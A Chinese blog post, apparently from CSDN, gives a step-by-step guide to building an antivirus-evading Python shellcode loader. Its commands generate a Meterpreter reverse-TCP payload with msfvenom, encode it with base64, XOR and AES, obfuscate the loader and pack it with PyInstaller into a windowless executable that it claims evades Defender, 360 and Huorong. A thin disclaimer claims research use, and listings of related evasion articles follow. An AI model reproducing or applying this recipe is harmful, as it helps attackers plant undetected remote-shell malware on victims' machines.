免杀方法(四)Python免杀shellcode加载器

最新推荐文章于 2024-04-27 22:06:40 发布
最新推荐文章于 2024-04-27 22:06:40 发布
阅读量1.1k 收藏 18
点赞数 1
分类专栏: 免杀技巧 文章标签: python 开发语言 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127156004
版权

项目作者:HZzz2

项目地址:https://github.com/HZzz2/python-shellcode-loader

一、工具介绍

免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES

将python代码缩小并混淆最后生成exe

目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等

二.安装与使用

1.获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.git
cd python-shellcode-loader 
pip install -r requirements.txt

  

2.生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=9999 -f raw > rev.raw

 3.base64编码shellcode并替换jiami.py中的值

base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'

 

 4、加密base64并替换main.py中的值

#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'

 

5.缩小和混淆py代码

缩小python代码
pyminify main.py --output main-mini.py
混淆main-mini.py中的python代码
https://pyob.oxyry.com/ 在线混淆

 

将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py

6、打包成可执行文件exe

 这里需要先安装模块tinyaes

#打包成exe
pyinstaller.exe -Fw -i .setting.ico --key=leslie .main-mini-ob.py
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成。。。。打包好后的可执行程序在dist目录中

 

 免杀结果

免责声明

仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。

所谓宿命,其实都是最好的安排。

 

夜yesec
关注
  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
木马免杀代码之python反序列化分离免杀
04-15 857
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
Python免杀技术详解
weixin_68789096的博客
11-02 1117
在网络安全领域,Shellcode加载通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode加载免杀技术。我们可以利用Python中的ctypes库实现shellcode加载,ctypes是Python的外部函数库。
免杀】分离免杀python)_shellcode loader免杀
最新发布
2401_84140130的博客
04-27 118
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载是用来运行shellcode加载,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2190
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
shellCode免杀技巧
qq_39330735的博客
05-15 2146
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 975
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机码,因为经常让攻击者获得shell而得名。shellcode常常使用机语言编写。可在暂存eip溢出后,塞入一段可让CPU执行的shellcode码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
Shellcode免杀对抗(Python)
热门推荐
qq_74806534的博客
02-17 2万+
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名。先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦。先base64,可以过掉火绒,过不了defender/360。
一款基于pythonshellcode免杀加载+源代码+文档说明
12-01
## 免杀测试 **过火绒** ![](picture/image-20231019203001783.png) **过defender** ![](picture/image-20231019204156899.png) **动态执行** ![image-20231020182032610](picture/image-20231020182032610....
利用Python反序列化运行加载实现免杀1
08-03
前言前几天在看Pythonshellcode加载,在网上找了一个,结果加载自身就过不了火绒,测试发现是火绒对关键语句进行了识别。所以我们要想办法去掉加载
基于Pythonshellcode加载+源代码+文档说明
12-01
基于Pythonshellcode加载(代码+文档说明) -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过...
shellcode加载用于加密shellcode的py小玩意
10-03
用于研究学习,请勿非法使用!10月VT检测率只有一个,可以过360火绒
AVByPass:一款Web在线自动免杀工具
05-31
一款利用加载以及Python反序列化绕过AV的在线免杀工具因为打包方式的局限性,不能跨平台,若要生成exe格式的只能在Windows下运行本项目打包速度有点慢,提交后稍等一会开发环境及运行前端使用框架,后端使用框架 ...
Python 应该怎么学?_python应该
m0_58269070的博客
04-26 401
fn() #执行传入的fn参数@timinglst=[]@timing[i for i in range(0,100000)] #列表生成式。
探索Python Shellcode Loader:一个创新的代码执行工具
gitblog_00032的博客
04-03 410
探索Python Shellcode Loader:一个创新的代码执行工具 项目地址:https://gitcode.com/HZzz2/python-shellcode-loader 项目简介 Python Shellcode Loader 是一个精心设计的开源项目,旨在为安全研究人员和开发人员提供一种便捷的方式,将Shellcode(操作系统级别的机码)注入到Python程序中运行。通过此项...
Python常见的免杀方式
m0_62207482的博客
02-09 1078
使用pyinstaller生成的可执行文件 本身就具有一定的免杀能力,但是在与杀毒软件对抗时,部分杀毒软件也可以通 过分析可执行文件的内容来判断文件是否为恶意程序,导致这些代码仍然具有被 杀的可能。·BackDoor-factory工具,又称后门工厂(BDF),利用该工具,可以在不破 坏原来的可执行文件功能的前提下,在代码中注入恶意的shellcode攻击代码。一部分杀毒软件的API拦截操作是通过对API的前几个字节内容的 监测实现的,如果跳过了头部字节,就可以避开这种拦截方式。· 未导出API。
免杀方法(五)golang加载cobaltstrike shellcode
qq_56426046的博客
10-04 1861
Go语言目前是最火的编程语言之一,使用go语言编写的加载,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
Python编写shellcode注入程序
weixin_33889245的博客
03-08 3264
light · 2014/12/29 11:570x00 背景本文为《小学生科普系列》的番外篇,本系列面向小学生,纯科普,大牛莫喷~教程中所有内容仅供学习研究,请勿用于非法用途,否则....我也帮不了你啊...说起注入,大家第一印象可能还习惯性的停留在sql注入,脚本注入(XSS)等。今天light同(jiao)学(shou)带大家从web端回到操作系统,一起探讨Windows下的经典注入——内存...
Python 加密 shellcode 免杀
Sylon的博客
08-04 3362
Python 加密 shellcode 免杀 环境准备: Windows7 32 位系统; Shellcode 使用 kali linux Metasploit 生成 shellcode Windows7 需要安装的软件: Python2.7, pip install pyinstaller pywin32-217.win32-py2.7.exe ...
[ShellCode] 动态解密 ShellCode免杀
LYSM
11-27 1941
背景 今天在复习《加密与解密》时,在软件保护这一章中有一个代码与数据结合的案例,其原理是将代码段中的代码进行xor异或加密处理以后回写到原始位置,当程序运行后将此处的内容动态的进行解密,解密后回写替换回原始内存位置,这样就能实现内存加载。 由此案例我想到一个关于免杀的利用思路,首先杀软的运作方式多数为特征码查杀,当我们程序中使用了敏感的函数时,就会存在被杀的风险,而如果将代码段中的代码进行加密,需要时直接在内存中解密,那么杀软将无法捕捉硬盘文件的特征,从而可以规避杀软针对硬盘特征的查杀手法。 经过阅读该案例
python shellcode免杀
06-06
Python shellcode免杀是指使用Python语言编写的shellcode可以避免被杀毒软件检测和拦截。这种技术主要是通过对shellcode进行加密、混淆、动态生成等方式来达到免杀的效果。其中,加密和混淆可以使shellcode的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值